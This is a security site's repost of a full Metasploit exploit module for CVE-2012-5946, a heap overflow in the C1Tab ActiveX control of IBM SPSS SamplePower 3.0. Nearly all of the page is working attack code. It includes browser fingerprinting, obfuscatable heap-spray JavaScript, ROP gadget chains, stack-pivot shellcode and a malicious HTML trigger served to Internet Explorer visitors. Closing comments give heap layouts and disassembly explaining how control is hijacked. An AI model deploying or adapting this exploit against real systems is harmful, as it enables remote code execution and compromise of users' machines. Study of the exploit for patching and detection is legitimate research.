首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
IBM SPSS SamplePower C1Tab ActiveX Heap Overflow
来源:metasploit.com 作者:vazquez 发布时间:2013-05-31  

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::RopDb
  include Msf::Exploit::Remote::BrowserAutopwn

  autopwn_info({
    :ua_name    => HttpClients::IE,
    :ua_minver  => "6.0",
    :ua_maxver  => "8.0",
    :javascript => true,
    :os_name    => OperatingSystems::WINDOWS,
    :rank       => NormalRanking,
    :classid    => "{24E04EBF-014D-471F-930E-7654B1193BA9}",
    :method     => "TabCaption"
  })


  def initialize(info={})
    super(update_info(info,
      'Name'           => "IBM SPSS SamplePower C1Tab ActiveX Heap Overflow",
      'Description'    => %q{
          This module exploits a heap based buffer overflow in the C1Tab ActiveX control,
        while handling the TabCaption property. The affected control can be found in the
        c1sizer.ocx component as included with IBM SPSS SamplePower 3.0. This module has
        been tested successfully on IE 6, 7 and 8 on Windows XP SP3 and IE 8 on Windows 7
        SP1.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Alexander Gavrun', # Vulnerability discovery
          'juan vazquez' # Metasploit
        ],
      'References'     =>
        [
          [ 'CVE', '2012-5946' ],
          [ 'OSVDB', '92845' ],
          [ 'BID', '59559' ],
          [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21635476' ]
        ],
      'Payload'        =>
        {
          'Space' => 991,
          'BadChars' => "\x00",
          'DisableNops' => true
        },
      'DefaultOptions'  =>
        {
          'InitialAutoRunScript' => 'migrate -f'
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # IBM SPSS SamplePower 3.0 / c1sizer.ocx 8.0.20071.39
          [ 'Automatic', {} ],
          [ 'IE 6 on Windows XP SP3',
            {
              'Offset' => '0x5F4',
              'Ret' => 0x0c0c0c08
            }
          ],
          [ 'IE 7 on Windows XP SP3',
            {
              'Offset' => '0x5F4',
              'Ret' => 0x0c0c0c08
            }
          ],
          [ 'IE 8 on Windows XP SP3',
            {
              'Offset' => '0x5f4',
              'Ret' => 0x0c0c0c0c,
              'Pivot' => 0x7c342643 # xchg eax, esp # pop edi # add byte ptr [eax],al # pop ecx # ret
            }
          ],
          [ 'IE 8 on Windows 7',
            {
              'Offset' => '0x5f4',
              'Ret' => 0x0c0c0c0c,
              'Pivot' => 0x7c342643 # xchg eax, esp # pop edi # add byte ptr [eax],al # pop ecx # ret
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Apr 26 2013",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
      ], self.class)

  end

  def get_target(agent)
    #If the user is already specified by the user, we'll just use that
    return target if target.name != 'Automatic'

    nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
    ie = agent.scan(/MSIE (\d)/).flatten[0] || ''

    ie_name = "IE #{ie}"

    case nt
    when '5.1'
      os_name = 'Windows XP SP3'
    when '6.0'
      os_name = 'Windows Vista'
    when '6.1'
      os_name = 'Windows 7'
    end

    targets.each do |t|
      if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
        print_status("Target selected as: #{t.name}")
        return t
      end
    end
    print_status("target not found #{agent}")
    return nil
  end

  def ie_heap_spray(my_target, p)
    js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
    js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))

    # Land the payload at 0x0c0c0c0c
    # For IE 6, 7, 8
    js = %Q|
    var heap_obj = new heapLib.ie(0x20000);
    var code = unescape("#{js_code}");
    var nops = unescape("#{js_nops}");
    while (nops.length < 0x80000) nops += nops;
    var offset = nops.substring(0, #{my_target['Offset']});
    var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
    while (shellcode.length < 0x40000) shellcode += shellcode;
    var block = shellcode.substring(0, (0x80000-6)/2);
    heap_obj.gc();
    for (var i=1; i < 0x300; i++) {
      heap_obj.alloc(block);
    }
    var overflow = nops.substring(0, 10);
    |

    js = heaplib(js, {:noobfu => true})

    if datastore['OBFUSCATE']
      js = ::Rex::Exploitation::JSObfu.new(js)
      js.obfuscate
    end

    return js
  end

  def junk(n=4)
    return rand_text_alpha(n).unpack("V").first
  end

  def rop_chain
    # gadgets from c1sizer.ocx
    rop_gadgets =
      [
        0x0c0c0c10,
        0x10026984, # ADD ESP,10 # POP EDI # POP ESI # POP EBX # POP EBP # RETN # stackpivot to the controlled stack
        0x100076f1, # pop eax # ret
        0x10029134, # &VirtualAllox
        0x1001b41e, # jmp [eax]
        0x0c0c0c34, # ret address
        0x0c0c0c0c,  # lpAddress
        0x00001000, # dwSize
        0x00001000, # flAllocationType
        0x00000040  # flProtect
      ].pack("V*")

    return rop_gadgets
  end

  def get_payload(t, cli)
    code = payload.encoded
    # No rop. Just return the payload.

    if (t.name =~ /IE 6/ or t.name =~ /IE 7/)
      fake_memory = [
        0x0c0c0c10,
        0x0c0c0c14
      ].pack("V*")
      return fake_memory + code
    end

    return rop_chain + stack_pivot + code
  end

  # Objects filling aren't randomized because
  # this combination make exploit more reliable.
  def fake_object(size)
    object = "B" * 8     # metadata
    object << "D" * size # fake object
    return object
  end

  def stack_pivot
    pivot = "\x64\xa1\x18\x00\x00\x00"  # mov eax, fs:[0x18 # get teb
    pivot << "\x83\xC0\x08"             # add eax, byte 8 # get pointer to stacklimit
    pivot << "\x8b\x20"                 # mov esp, [eax] # put esp at stacklimit
    pivot << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset
    return pivot
  end

  # Check the memory layout documentation at the end of the module
  def overflow_xp
    buf = rand_text_alpha(0x10000)
    # Start to overflow
    buf << fake_object(0x40)
    buf << fake_object(0x30)
    buf << fake_object(0x30)
    buf << fake_object(0x40)
    buf << fake_object(0x10)
    buf << fake_object(0x10)
    buf << fake_object(0x20)
    buf << fake_object(0x10)
    buf << fake_object(0x30)
    buf << "B" * 0x8     # metadata chunk
    buf << "\x0c" * 0x40 # Overflow first 0x40 of the exploited object
  end

  # Check the memory layout documentation at the end of the module
  def overflow_xp_ie8
    buf = [
      junk,       # padding
      0x1001b557, # pop eax # c1sizer.ocx
      0x0c0c0c14, # eax
      0x10028ad8  # xchg eax,esp # c1sizer.ocx # stackpivot to the heap
    ].pack("V*")
    buf << rand_text_alpha(0x10000-16)
    # Start to overflow
    buf << "B" * 0x8     # metadata chunk
    buf << "\x0c" * 0x40 # Overflow first 0x40 of the exploited object
  end

  # Check the memory layout documentation at the end of the module
  def overflow_w7
    buf = [
      junk,       # padding
      0x1001b557, # pop eax # c1sizer.ocx
      0x0c0c0c14, # eax
      0x10028ad8  # xchg eax,esp # c1sizer.ocx # stackpivot to the heap
    ].pack("V*")
    buf << rand_text_alpha(0x10000-16)
    # Start to oveflow
    buf << fake_object(0x3f8)
    buf << fake_object(0x1a0)
    buf << fake_object(0x1e0)
    buf << fake_object(0x1a0)
    buf << fake_object(0x1e0)
    buf << fake_object(0x1a0)
    buf << "B" * 0x8     # metadata chunk
    buf << "\x0c" * 0x40 # Overflow first 0x40 of the exploited object
  end

  def get_overflow(t)
    if t.name =~ /Windows 7/
      return overflow_w7
    elsif t.name =~ /Windows XP/ and t.name =~ /IE 8/
      return overflow_xp_ie8
    elsif t.name =~ /Windows XP/
      return overflow_xp
    end
  end

  # * 15 C1TAB objects are used to defragement the heap, so objects are stored after the vulnerable buffer.
  # * Based on empirical tests, 5th C1TAB comes after the vulnerable buffer.
  # * Using the 7th CITAB is possible to overflow itself and get control before finishing the set of the
  # TabCaption property.
  def trigger_w7
    target = rand_text_alpha(5 + rand(3))
    target2 = rand_text_alpha(5 + rand(3))
    target3 = rand_text_alpha(5 + rand(3))
    target4 = rand_text_alpha(5 + rand(3))
    target5 = rand_text_alpha(5 + rand(3))
    target6 = rand_text_alpha(5 + rand(3))
    target7 = rand_text_alpha(5 + rand(3))
    target8 = rand_text_alpha(5 + rand(3))
    target9 = rand_text_alpha(5 + rand(3))
    target10 = rand_text_alpha(5 + rand(3))
    target11 = rand_text_alpha(5 + rand(3))
    target12 = rand_text_alpha(5 + rand(3))
    target13 = rand_text_alpha(5 + rand(3))
    target14 = rand_text_alpha(5 + rand(3))
    target15 = rand_text_alpha(5 + rand(3))

    objects = %Q|
    <object id="#{target}" width="100%" height="100%" classid="clsid:24E04EBF-014D-471F-930E-7654B1193BA9"></object>
    <object id="#{target2}" width="100%" height="100%" classid="clsid:24E04EBF-014D-471F-930E-7654B1193BA9"></object>
    <object id="#{target3}" width="100%" height="100%" classid="clsid:24E04EBF-014D-471F-930E-7654B1193BA9"></object>
    <object id="#{target4}" width="100%" height="100%" classid="clsid:24E04EBF-014D-471F-930E-7654B1193BA9"></object>
    <object id="#{target5}" width="100%" height="100%" classid="clsid:24E04EBF-014D-471F-930E-7654B1193BA9"></object>
    <object id="#{target6}" width="100%" height="100%" classid="clsid:24E04EBF-014D-471F-930E-7654B1193BA9"></object>
    <object id="#{target7}" width="100%" height="100%" classid="clsid:24E04EBF-014D-471F-930E-7654B1193BA9"></object>
    <object id="#{target8}" width="100%" height="100%" classid="clsid:24E04EBF-014D-471F-930E-7654B1193BA9"></object>
    <object id="#{target9}" width="100%" height="100%" classid="clsid:24E04EBF-014D-471F-930E-7654B1193BA9"></object>
    <object id="#{target10}" width="100%" height="100%" classid="clsid:24E04EBF-014D-471F-930E-7654B1193BA9"></object>
    <object id="#{target11}" width="100%" height="100%" classid="clsid:24E04EBF-014D-471F-930E-7654B1193BA9"></object>
    <object id="#{target12}" width="100%" height="100%" classid="clsid:24E04EBF-014D-471F-930E-7654B1193BA9"></object>
    <object id="#{target13}" width="100%" height="100%" classid="clsid:24E04EBF-014D-471F-930E-7654B1193BA9"></object>
    <object id="#{target14}" width="100%" height="100%" classid="clsid:24E04EBF-014D-471F-930E-7654B1193BA9"></object>
    <object id="#{target15}" width="100%" height="100%" classid="clsid:24E04EBF-014D-471F-930E-7654B1193BA9"></object>
    |
    return objects, target7
  end

  # * Based on empirical test, the C1TAB object comes after the vulnerable buffer on memory, so just
  # an object is sufficient to overflow itself and get control execution.
  def trigger_xp
    target = rand_text_alpha(5 + rand(3))

    objects = %Q|
    <object id="#{target}" width="100%" height="100%" classid="clsid:24E04EBF-014D-471F-930E-7654B1193BA9"></object>
    |
    return objects, target
  end

  def get_trigger(t)
    if t.name =~ /Windows 7/
      return trigger_w7
    elsif t.name =~ /Windows XP/
      return trigger_xp
    end
  end

  def load_exploit_html(my_target, cli)
    p  = get_payload(my_target, cli)
    js = ie_heap_spray(my_target, p)
    buf = get_overflow(my_target)

    objects, target_object = get_trigger(my_target)

    html = %Q|
    <html>
    <head>
    </head>
    <body>
    #{objects}
    <script>
    CollectGarbage();
    #{js}
    #{target_object}.Caption = "";
    #{target_object}.TabCaption(0) = "#{buf}";
    </script>
    </body>
    </html>
    |

    return html
  end

  def on_request_uri(cli, request)
    agent = request.headers['User-Agent']
    uri   = request.uri
    print_status("Requesting: #{uri}")

    my_target = get_target(agent)
    # Avoid the attack if no suitable target found
    if my_target.nil?
      print_error("Browser not supported, sending 404: #{agent}")
      send_not_found(cli)
      return
    end

    html = load_exploit_html(my_target, cli)
    html = html.gsub(/^\t\t/, '')
    print_status("Sending HTML...")
    send_response(cli, html, {'Content-Type'=>'text/html'})
  end

end


=begin

[*] Windows XP / ie6 & ie7 memory layout at oveflow, based on empirical test

    Heap entries for Segment01 in Heap 01ca0000
         address: psize . size  flags   state (requested size)
        025c0000: 00000 . 00040 [01] - busy (40)
        025c0040: 00040 . 10008 [01] - busy (10000)
        025d0048: 10008 . 10008 [01] - busy (10000) // Overflowed buffer
        025e0050: 10008 . 00048 [01] - busy (40)
        025e0098: 00048 . 00038 [01] - busy (30)
        025e00d0: 00038 . 00038 [01] - busy (30)
        025e0108: 00038 . 00048 [01] - busy (40)
        025e0150: 00048 . 00018 [01] - busy (10)
        025e0168: 00018 . 00018 [01] - busy (10)
        025e0180: 00018 . 00028 [01] - busy (20)
        025e01a8: 00028 . 00018 [01] - busy (10)
        025e01c0: 00018 . 00010 [00]
        025e01d0: 00010 . 00038 [01] - busy (30)
        025e0208: 00038 . 001e8 [01] - busy (1e0)   // Vulnerable object
        025e03f0: 001e8 . 001a8 [01] - busy (1a0)


[*] Windows XP / ie8 memory layout at oveflow, based on empirical test

    Heap entries for Segment01 in Heap 03350000
         address: psize . size  flags   state (requested size)
        03840000: 00000 . 00040 [01] - busy (40)
        03840040: 00040 . 10008 [01] - busy (10000)
        03850048: 10008 . 10008 [01] - busy (10000) // Overflowed buffer
        03860050: 10008 . 001e8 [01] - busy (1e0)   // Vulnerable object
        03860238: 001e8 . 001a8 [01] - busy (1a0)
        038603e0: 001a8 . 00078 [00]
        03860458: 00078 . 00048 [01] - busy (40)
        038604a0: 00048 . 00048 [01] - busy (40)
        038604e8: 00048 . 00618 [01] - busy (610)
        03860b00: 00618 . 10208 [01] - busy (10200)
        03870d08: 10208 . 032f8 [10]
        03874000:      000cc000      - uncommitted bytes.


[*] windows 7 / ie8 memory layout at oveflow, based on empirical test

  03240000: 00000 . 00040 [101] - busy (3f)
  03240040: 00040 . 10008 [101] - busy (10000)
  03250048: 10008 . 10008 [101] - busy (10000) # Overwritten buffer
  03260050: 10008 . 00400 [101] - busy (3f8) Internal
  03260450: 00400 . 001a8 [101] - busy (1a0)
  032605f8: 001a8 . 001e8 [101] - busy (1e0)
  032607e0: 001e8 . 001a8 [101] - busy (1a0)
  03260988: 001a8 . 001e8 [101] - busy (1e0)
  03260b70: 001e8 . 001a8 [101] - busy (1a0)
  03260d18: 001a8 . 001e8 [101] - busy (1e0)   # Our vulnerable object, target7, seems reliable according to testing
  03260f00: 001e8 . 001a8 [101] - busy (1a0)
  032610a8: 001a8 . 001e8 [101] - busy (1e0)
  03261290: 001e8 . 001a8 [101] - busy (1a0)
  03261438: 001a8 . 001e8 [101] - busy (1e0)
  03261620: 001e8 . 001a8 [101] - busy (1a0)
  032617c8: 001a8 . 001e8 [101] - busy (1e0)

[*] Overflow:

.text:100146E1                 push    eax             ; lpString2
.text:100146E2                 push    CaptionlpBuffer ; lpString1
.text:100146E8                 call    ds:lstrcatA     ; Heap Overflow when setting a new CaptionString > 0x10000

[*] Get Control after overflow:

.text:1001A40D                 call    overflow_sub_1001469E ; Overflow happens here
.text:1001A412                 mov     ecx, edi        ; edi points to the overflowed object, then ecx (this)
.text:1001A414                 call    get_control_sub_100189EC ; Get profit from the overflowed object here

.text:100189EC get_control_sub_100189EC proc near      ; CODE XREF: sub_1001A1A9+B6p
.text:100189EC                                         ; SetTabCaption_sub_1001A2EC+128p ...
.text:100189EC
.text:100189EC var_4           = dword ptr -4
.text:100189EC
.text:100189EC                 push    ebp
.text:100189ED                 mov     ebp, esp
.text:100189EF                 push    ecx
.text:100189F0                 mov     eax, [ecx+10h] # ecx points to controlled memory, so eax can be controlled
.text:100189F3                 and     [ebp+var_4], 0
.text:100189F7                 test    eax, eax
.text:100189F9                 jz      short locret_10018A23
.text:100189FB                 mov     ecx, [eax] # eax can be controlled and make it point to sprayed mem, ecx can be controlled
.text:100189FD                 lea     edx, [ebp+var_4]
.text:10018A00                 push    edx
.text:10018A01                 push    offset unk_1002B628
.text:10018A06                 push    eax
.text:10018A07                 call    dword ptr [ecx] # woot!

=end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·CodeBlocks 12.11 (Mac OS X) -
·Logic Print 2013 - Stack Overf
·HP LaserJet Pro P1606dn Passwo
·Intrasrv Simple Web Server 1.0
·CompatUI ActiveX Control <= Re
·Zyxel NBG5715 Local admin priv
·SIEMENS Solid Edge ST4 SEListC
·Lianja SQL 1.0.0RC5.1 db_netse
·SIEMENS Solid Edge ST4 WebPart
·ModSecurity Remote Null Pointe
·Show In Browser 0.0.3 Ruby Gem
·BOINC Manager (Seti@home) 7.0.
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved